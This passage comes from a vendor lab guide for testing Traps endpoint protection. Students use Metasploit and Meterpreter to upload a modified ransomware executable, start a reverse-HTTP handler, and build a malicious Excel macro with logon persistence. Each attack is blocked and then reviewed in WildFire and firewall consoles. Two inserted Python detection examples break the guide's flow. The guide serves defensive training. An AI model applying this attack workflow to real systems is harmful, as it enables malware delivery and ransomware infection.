recorded on this system.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Local Analysis Module) and
terminated the process.
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that the “Details” window indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Click the “ESM Server” tab to access that desktop environment. This should display the ESM Server console.
Note: Since we have not used this environment for some time now, it is possible that the CloudShare
system has disconnected your session. If you realize that the environment does not respond to your
mouse clicks or keystrokes at this point, simply click the “Reconnect” button in the left-hand pane. That
will reconnect you to the ESM Server system.
In the ESM Server console, click the “Policies” tab. This will display the Exploit Protection Modules (by
default).
In the left navigation area, click the “Hash Control” link under the “Malware” heading. This will display a table
of all executable files that have been run on the endpoints connected to the ESM Server, along with their
respective verdicts.
Notice “happy.exe” among the first few entries in this table, along with its (new) hash and a verdict of malware
(indicated by the red “X”) obtained via Local Analysis (another name for Static Analysis). Also note that the
ESM is uploading this malware to WildFire, as indicated by the icon under the “Upload Status” column in the
table.
This upload process occurs without delay in production deployments. However, in the bandwidth-
limited CloudShare environment, the upload process may take some time.
Once the upload has been completed, WildFire will analyze the unknown malware sample, render a verdict,
and transmit that verdict back to the ESM Server. The updated verdict will then be visible in this table.
In the ESM Server console, click the “Policies” tab, followed by the “WildFire” link under the “Malware”
heading in the left column navigation area. This will display the list of WildFire policies currently configured on
the ESM.
Click the second entry in the table (the policy named “WildFire On”) to display its expanded information area.
Notice the policy settings that are visible in this view:
• WildFire activation is on: Traps will check unknown executables with WildFire for a verdict
• Action is prevention: Traps will prevent unknown executables that are deemed to be malicious
• Action is applied on grayware: Traps will apply the prevention action to grayware as well
• User alert is on: Traps will alert the user when an unknown executable is prevented from running
• Upload file for WildFire analysis is enabled: Traps will upload unknown executables to WildFire for
analysis
• Local analysis is enabled: Traps will examine unknown executables with its local, static analysis
engine
• Quarantine files is enabled: Traps will quarantine files that are deemed to be malicious
Click the “Edit” button to modify this policy. This will display the WildFire policy editor window, with the
“Settings” tab visible. From the “WildFire Activation” drop-down, select the “Off” option. This will disable
WildFire, Static Analysis, and Quarantine features of Traps.
Next, click the “Name” tab in the same editor window to display the name that is automatically assigned to this
policy (“WildFire On”).
Change the name of the policy to “WildFire is Off” in the text box labeled “Fill in the rule name” and click the
“Apply” button to save your changes.
This will return you to the list of WildFire policies currently configured on the ESM.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
The Traps client console should already be visible. Otherwise, click the Traps icon in the Windows Taskbar.
You may notice that a message pops up on the Windows desktop indicating that virus protection has been
disabled. This is because Traps is registered with Microsoft Security Center as an official anti-virus
product.
Now upload the modified ransomware sample you created in the previous Task to the Traps Client by typing
the following command at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field indicates that Traps blocked an “Attempted execution from a restricted
folder.”
If you recall our review of the Execution Restrictions policies through the ESM Server console (Activity 4, Task
3, Step 3), Traps was programmed to prevent execution of programs from the “C:\Temp” directory. This is
precisely what happened in this Step.
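The folder-based execution restriction described above, as an added example that is not Traps code: the policy table is constructed from the guide's C:\Temp restriction, and the ordering in evaluate_execution (verdict chain first, folder restriction second) is an assumption drawn from the order in which the guide's events occurred. The check normalises Windows paths so that letter case, forward slashes and “..” segments cannot bypass it, and compares whole path components so that a folder such as C:\Temporary is not caught by a C:\Temp rule.

```python
import ntpath

# Constructed policy table mirroring the guide's restriction on C:\Temp.
RESTRICTED_FOLDERS = [r"C:\Temp"]

def _parts(path: str) -> list:
    """Normalise a Windows path into lower-cased components so that letter
    case, slash style and '..' segments cannot sidestep a prefix comparison."""
    norm = ntpath.normpath(path).lower()
    drive, rest = ntpath.splitdrive(norm)
    return [drive] + [p for p in rest.split("\\") if p]

def is_restricted(exe_path: str, folders=RESTRICTED_FOLDERS) -> bool:
    r"""True when exe_path lies inside a restricted folder at any depth.
    Whole components are compared, so C:\Temporary does not match C:\Temp."""
    exe = _parts(exe_path)
    for folder in folders:
        f = _parts(folder)
        if len(exe) > len(f) and exe[:len(f)] == f:
            return True
    return False

def evaluate_execution(exe_path: str, known_malware: bool,
                       wildfire_on: bool) -> tuple:
    """Return (blocked, component, quarantined). Assumed ordering: the
    verdict chain runs first and the folder restriction catches what it lets
    through. A restriction block records Quarantine: No because the file was
    never given a malware verdict, matching the guide's event details."""
    if wildfire_on and known_malware:
        return True, "WildFire", True
    if is_restricted(exe_path):
        return True, "Execution Protection Module", False
    return False, None, False

if __name__ == "__main__":
    for p in (r"C:\Temp\happy.exe", r"c:\TEMP\sub\happy.exe",
              r"C:\Temporary\happy.exe", "C:/Temp/../Temp/happy.exe"):
        print(p, evaluate_execution(p, known_malware=False, wildfire_on=False))
```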
Click “OK” to dismiss the alert window.
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
recorded on this system.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Execution Protection
Module) and terminated the process.
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that the “Details” window indicates that Traps did not quarantine the malware (as shown by the entry
“Quarantine: No”), because it was not specifically identified as malware.
Close Internet Explorer and Outlook by clicking the “X” in the top-right corner of each window.
Click the “Attacker” tab to display that desktop environment.
Next, click inside the Terminal window that should still be displaying the Meterpreter prompt (“meterpreter >”).
Hit the “enter/return” key a few times to display a new prompt. The Meterpreter session should have
automatically terminated (since you shut down Internet Explorer in the Traps Client environment).
At the Metasploit prompt (“msf exploit(adobe_flash_hacking_team_uaf) >”), type the following commands,
hitting the “enter/return” key after each:
exit
clear
End of Activity 6
In the last set of tasks of the previous Activity, you used a command line tool to modify the ransomware
executable “happy.exe” to create a new malware with a file hash that was unknown to both Traps and
WildFire.
The local Static Analysis check in Traps correctly blocked this newly modified ransomware, quarantined the
file, and transmitted the file to WildFire for full analysis.
Click the “ESM Server” tab to access that desktop environment. This should display the ESM Server console.
Note: Since we have not used this environment for some time now, it is possible that the CloudShare
system has disconnected your session. If you realize that the environment does not respond to your
mouse clicks or keystrokes at this point, simply click the “Reconnect” button in the left-hand pane. That
will reconnect you to the ESM Server system.
In the ESM Server console, click the “Policies” tab. This will display the Exploit Protection Modules (by
default).
In the left navigation area, click the “Hash Control” link under the “Malware” heading. This will display a table
of all executable files that have been run on the endpoints connected to the ESM Server, along with their
respective verdicts.
Notice “happy.exe” among the first few entries in this table, along with its (new) hash and a verdict of malware
(indicated by the red “X”) obtained via Local Analysis (another name for Static Analysis).
The ESM upload of this malware to WildFire should have been completed at this point, as indicated by the
icon under the “Upload Status” column in the table. Note, if you have worked through the tasks quickly, the
verdict may not be available. Please recheck after a couple of minutes.
In the Hash Control table, click the record that corresponds to the (modified) “happy.exe.” This will display an
expanded information area.
Use the right-arrow key on your keyboard to scroll right in the table to display the “WildFire Report” button in
this expanded information area.
Click the “WildFire Report” button to download the report.
Chrome will download the report and display a download bar on the bottom of the browser window.
Click the button on the download bar that corresponds to the file you just downloaded. This will open the PDF file
in a separate browser tab.
Review the WildFire report to learn more about the types of information WildFire reveals through its full
analysis of the ransomware file.
The threat intelligence gained through the WildFire analysis will have automatically reprogrammed the Next-
Generation Firewall in the UTD environment to prevent access to the malware file.
For this step, we will use the web server that is located on the Attacker system. The Attacker system is
equipped with a separate network interface that is routed through the Next-Generation Firewall, so the firewall
will evaluate and secure any requests directed to the web server through this interface.
Click the “Attacker” tab to display that desktop environment.
Next, click inside either of the terminal windows that are currently open on the Attacker desktop system, and
type the following command to transfer “happy.exe” to the root directory of the web server:
cp happy.exe /var/www/ngfw/
In the list of files from the web server that are displayed in the browser, click the name of our ransomware file,
“happy.exe.”
The browser should now display a message stating that “Virus/Spyware Download Blocked” and identify the
file that you attempted to download, “happy.exe.”
This verifies that when Traps encountered an unknown malware (the modified ransomware) and submitted it
to WildFire for analysis, the threat intelligence gained from that analysis automatically reprogrammed the
Next-Generation Firewall in the UTD environment to block the transfer of the file through the firewall.
Close Internet Explorer by clicking the “X” on the top-right corner of that window. If Outlook is still open, close
it as well.
End of Activity 7
From the “Shortcut Menu” at the top of the browser, click “VM List”. This page will show all the available VMs.
Click “Revert VM” to start the revert process. This should take 5-10 minutes.
It may take up to 5 minutes for the effects of the attack to become noticeable. Once the Gryphon ransomware
has finished encrypting files, it will launch Notepad with the ransom note.
Notice that even the folder on the desktop has been encrypted. All files encrypted will have the extension
“[chines34@protonmail.ch].gryphon”.
The default Traps policy will stop the ransomware before any files are encrypted.
Click “Show Details” to see that the “Anti-Ransomware Protection” module was activated.
Click the “Events” tab in the Traps console window. This shows that the Anti-Ransomware Protection module
caught the process “OnlineGames.exe” and terminated it.
Notice that a WildFire report is already available: this file is already known to WildFire and would have
been stopped immediately as known malware. We had previously disabled WildFire so you could see the
multi-layer capabilities that detect and prevent ransomware launched using malicious executable files.
End of Activity 8
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./macro.sh
This will load Metasploit and configure it to listen for incoming HTTP connections from the victim system.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(handler) >”
The attacker system is now ready and online, waiting for a connection from the victim system.
Next, right click the icon and select Run with PowerShell.
Enter a document name of your choosing.
Enter “1” for Meterpreter Shell with Logon Persistence.
Enter “2” for Meterpreter Reverse HTTP.
Once complete, the PowerShell window will close. There will be a new Excel file on the desktop with the
document name you provided.
In the ESM Server console, click the “Policies” tab. This will display the Application Protection Modules (by
default).
In the left navigation area, click the “WildFire” link under the “Malware” heading.
Click the “WildFire for Office files: Off” policy.
Click the “Edit” button to modify this policy. This will display the WildFire policy editor window, with the
“Settings” tab visible. From the “Activation” drop-down, select the “On” option. This will enable WildFire and
Static Analysis features of Traps for Office files.
Next, click the “Name” tab in the same editor window to display the name that is assigned to this policy
(“WildFire for Office files: Off”).
Change the name of the policy to “WildFire for Office files: On” in the rule name text box and click the “Apply”
button to save your changes.
This will return you to the list of WildFire policies currently configured on the ESM.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the “Check In Now” link on the bottom of the Traps console window to retrieve from the ESM
Server the changes in the WildFire policy that you just enacted in the previous Task.
Click the “Policy” tab in the Traps client console. Verify that the “WildFire for Office files: On” policy that you
created in the previous Task is now displayed among the policies in effect on this Traps client.
Find the Excel file that you previously generated in Task 3, Step 2 and double-click it to open the document.
This will launch Excel and attempt to open the document. Traps should stop the file from opening and display
a prevention dialog box informing you that Traps has blocked a malicious activity.
Click the “Show Details” button to see that this previously-unknown macro was stopped by Local Analysis.
Click the “Events” tab in the Traps console window. This shows that Local Analysis caught the macro running
in the process “excel.exe” and terminated it.
Next, click the “Hash Control” button to directly access the admin override policy associated with the Excel file
that you tried to open.
Click on the entry to open it and view additional details.
Click “Show Details” to see that this previously known macro was stopped by WildFire.
Click the “Events” tab in the Traps console window. This shows that WildFire prevented the macro from running in
the process “excel.exe” and terminated it.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the “Check In Now” link on the bottom of the Traps console window to retrieve from the ESM
Server the changes in the WildFire policy that you just enacted in the previous Task.
Click the “Policy” tab in the Traps client console. Verify that the “WildFire for Office files: Off” policy that you
created in the previous Step is now displayed among the policies in effect on this Traps client.
Find the Excel file named “FinancialReport” on the desktop and double-click it to open the file.
Excel will open to a blank spreadsheet. When prompted, click “Enable Content”.
Traps will stop the macro from running due to a “Suspicious process creation detected”.
Click “Show details” and scroll down to see that the macro attempted to launch the child process “wscript.exe.”
The Child Process Protection component of Traps stopped its execution.
Click the “Events” tab in the Traps console window. This shows that Child Process Protection prevented the
macro from running in the process “excel.exe” and terminated it.
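The parent/child rule behind the event above (Excel spawning wscript.exe), as an added detection example that is not Traps code: the rule table, the record format and the sample log are constructed here, and the FinancialReport file name is given a constructed .xlsm extension. The rule compares only image file names, so the Office install path does not matter.

```python
import ntpath

# Constructed rule table: Office applications that have no business spawning
# script hosts or shells. The guide does not publish Traps' own rule set.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RESTRICTED_CHILDREN = {"wscript.exe", "cscript.exe", "cmd.exe",
                       "powershell.exe", "mshta.exe", "rundll32.exe"}

def parse_event(line: str) -> dict:
    """Parse one constructed 'Key=value; Key=value' process-creation record
    (values must not contain ';'). Keys are lower-cased."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            fields[key.strip().lower()] = value.strip()
    return fields

def child_process_verdict(event: dict) -> dict:
    """Apply the parent/child rule; only the file names are compared, so the
    Office install path does not matter."""
    parent = ntpath.basename(event.get("parentimage", "")).lower()
    child = ntpath.basename(event.get("image", "")).lower()
    if parent in OFFICE_PARENTS and child in RESTRICTED_CHILDREN:
        return {"action": "block", "component": "Child Process Protection",
                "description": "Suspicious process creation detected",
                "parent": parent, "child": child,
                "commandline": event.get("commandline", "")}
    return {"action": "allow", "parent": parent, "child": child}

def scan(lines) -> list:
    """Return the verdicts for every record in lines that the rule blocks."""
    hits = []
    for line in lines:
        if line.strip():
            verdict = child_process_verdict(parse_event(line))
            if verdict["action"] == "block":
                hits.append(verdict)
    return hits

# Constructed sample log. Only the third record matches the guide's scenario
# (Excel launching wscript.exe); the others are ordinary activity.
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
SAMPLE_LOG = [
    "ParentImage=C:\\Windows\\explorer.exe; Image=" + OFFICE + "EXCEL.EXE; "
    "CommandLine=EXCEL.EXE C:\\Users\\user\\Desktop\\FinancialReport.xlsm",
    "ParentImage=" + OFFICE + "EXCEL.EXE; Image=C:\\Windows\\splwow64.exe; "
    "CommandLine=splwow64.exe 12288",
    "ParentImage=" + OFFICE + "EXCEL.EXE; Image=C:\\Windows\\System32\\wscript.exe; "
    "CommandLine=wscript.exe C:\\Users\\user\\AppData\\Local\\Temp\\run.vbs",
    "ParentImage=C:\\Windows\\System32\\cmd.exe; Image=C:\\Windows\\System32\\wscript.exe; "
    "CommandLine=wscript.exe logon.vbs",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["component"], hit["parent"], "->", hit["child"], hit["commandline"])
```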
Notice that no active connections have been established. Traps has prevented both known and unknown
malicious macros from compromising our endpoint.
End of Activity 9
Thank you for attending the Ultimate Test Drive event. We hope that you found the presentation and lab
activities enjoyable and informative.
In this Activity, we ask that you complete a short evaluation/survey to share your thoughts about this UTD.
We need and appreciate your guidance and advice.
In your browser, click the “Survey” tab among the list of the available desktop environments for the UTD.
Follow the on-screen instructions to complete the survey and submit your results.
End of Activity 10
If the firewall is not connected to the Internet, you can enable the firewall interface to allow Internet connectivity.
In your browser, click the “Traps Client” link on the Shortcut Menu that lists the available desktop
environments in the UTD. This will connect you to the “Traps Client” through your browser.
This logs you in to the firewall and displays the main dashboard.
Click the “Network” tab, then click the “Interfaces” node on the left-hand side. This will display all the interfaces
configured for the firewall.
Click the interface “ethernet1/1” under the “Ethernet” tab. This will display the configuration dialog box.
Click the “Advanced” tab and select “up” in the “Link State” drop-down to the right of the dialog box; then click
“OK” to return to the network interface listing.
This will display a confirmation pop-up. Click “Commit” in the pop-up window to confirm your choice. This will
display the Commit Status dialog box containing a progress bar.
Once the process has completed, click “Close” in the pop-up window to return to the network interface listing.
The “Link Status” of “ethernet1/1” has turned green now that the interface is up.
Open a new tab in the browser window and confirm Internet connectivity by visiting http://www.google.com.
(Note that only the google-base application is allowed in the firewall policy; other web sites will be blocked.)
Once you have verified internet connectivity, close the browser by clicking the “X” in the top-right corner of the
browser’s application window.
This appendix provides instructions to access the Attacker (Kali Linux) VM. If the GUI is slow using the default
console access, this is the alternative access method.
You will automatically be logged into an SSH session instead of the GUI.
Since the SSH session is a single shell window, you will need to perform the following steps once you reach
Continue with Activity 6, Task 3. When done, type “fg” to return Metasploit/Meterpreter to the foreground.